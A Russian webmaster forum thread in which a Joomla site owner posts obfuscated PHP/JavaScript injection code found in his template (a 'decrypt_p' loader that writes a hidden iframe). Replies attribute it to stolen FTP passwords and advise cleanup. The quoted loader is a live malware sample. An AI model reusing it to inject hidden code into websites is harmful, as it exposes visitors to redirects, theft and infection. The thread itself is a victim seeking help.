Взломали сайт и вставили это:

12
A7
На сайте с 22.10.2010
Offline
77
1774

Вопрос к профи, сегодня заметил на своём сайте изменения в шаблоне, которые были внесены без моего ведома, сайт сделан на джумле а код был такой

<?&#65533;

* w<&#1663;u&#1501;m&#65533;} *

y&#65533;h m&#65533;&#65533;_u&#65533;(u('<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,36,4,22,25,40,34,21,1,9,0,0,0,0,0,0,8,42,11,2,39,38,62,59,26,27,16,19,33,50,31,0,24,49,23,10,15,28,41,60,55,37,56,0,0,0,0,61,0,20,3,45,29,57,5,12,43,52,14,6,17,48,44,18,30,46,58,51,13,54,35,32,7,47,53);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("4MWmRKgMOR5igxUitveLapPLtbgsCXUiPp@Yx35zRIgExuUilR_DSA5YRkcz8BnzOBW6khW6kIn6iKysvNqm7ojeiR9rDKpYLbqsk0Feis0r1Bge6Nj_mNpZ1v9Exq4ESMWmRKgMOyeL")</script>

');

Кто может подсказать для чего это делалось и как могли попасть?

А вот лет 100 назад, предложение "получите ссылку", мягко говоря напрягало.
ДП
На сайте с 23.11.2009
Offline
203
#1

Делается для вставки вот такого кода:


<iframe width="1" height="1" src=""></iframe>"

Как - это уже другой вопрос - более сложный.

arkadiy_a
На сайте с 11.06.2008
Offline
82
#2

Узнал еврейские и арабские буквы. Неужели сионисты с террористами сюда добрались?

vandamme
На сайте с 30.11.2008
Offline
675
#3
armor71:

Кто может подсказать для чего это делалось и как могли попасть?

через фтп вероятно, это какбэ вирус на сайте

minor
На сайте с 04.10.2010
Offline
70
#4

Меняйте пароли от всего и чистите комп.

PHP experience 2 year, comprehend seo
V
На сайте с 05.01.2011
Offline
23
#5
minor:
Меняйте пароли от всего и чистите комп.

ага и еще монитор зеленкой на всякий случай , сначала найди причину , не ставил ли модули в последнее время шаблоны или еще что

A7
На сайте с 22.10.2010
Offline
77
#6
Дикий пионер:
Делается для вставки вот такого кода:

<iframe width="1" height="1" src=""></iframe>"

Как - это уже другой вопрос - более сложный.

А для чего этот код вставляют, я первый раз с этим столкнулся

armor71 добавил 03.02.2011 в 18:07

minor:
Меняйте пароли от всего и чистите комп.

У меня каспер лицензия стоит

WS
На сайте с 17.11.2010
Offline
25
#7
armor71:
У меня каспер лицензия стоит

Мы рады за вас, а теперь меняйте пароли и чистите комп всем что только сможете. Наличие самого крутого антивира не разу не спасает от кражи паролей.

WhiteSmartFox добавил 03-02-2011 в 19:28

armor71:
А для чего этот код вставляют, я первый раз с этим столкнулся

Для миллиона вещей, например для переадресации части пользователей на другой сайт, кражи данных или заражения вирусами, дальше перечислять?

WhiteSmartFox добавил 03-02-2011 в 19:31

veterinar:
ага и еще монитор зеленкой на всякий случай , сначала найди причину , не ставил ли модули в последнее время шаблоны или еще что

Зря иронизируете в 95% случаев код появляется из-за кражи фтп паролей с обычного компа.

A7
На сайте с 22.10.2010
Offline
77
#8

Спасибо за разъяснения

armor71 добавил 03.02.2011 в 21:53

Парни АХТУНГ! Проблема оказалось на много серьёзней чем я думал, этот код залез во все файлы index.php на нескольких сайтах. Один сайт сожрало, но у меня его была копия он маленький я его скопировал, а вот с другим я хз что делать.Подскажите плиз.

DeL Esprit
На сайте с 27.01.2010
Offline
223
#9
armor71:
Спасибо за разъяснения

armor71 добавил 03.02.2011 в 21:53
Парни АХТУНГ! Проблема оказалось на много серьёзней чем я думал, этот код залез во все файлы index.php на нескольких сайтах. Один сайт сожрало, но у меня его была копия он маленький я его скопировал, а вот с другим я хз что делать.Подскажите плиз.

тогда точно кража паролей через фтп.

Тестирую облачный майнинг - узнаем развод или нет. - окупаемость 3 месяца? мелкие суммы (https://goo.gl/aPWmoj) | майнинг Monero, минимум $830 (https://goo.gl/3XivbP) Биржи (ввод/вывод) - на Приват (https://goo.gl/CGZTnD), на Payeer, Capitalist, Advcash, Qiwi... (https://goo.gl/eejAgs)
alexwin
На сайте с 15.04.2008
Offline
76
#10
в 95% случаев код появляется из-за кражи фтп паролей с обычного компа.

Я когда-то пользовался тоталкомандером для фтп и в нем сохранял пароли. Оттуда и тырили. Касперский тоже стоял.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий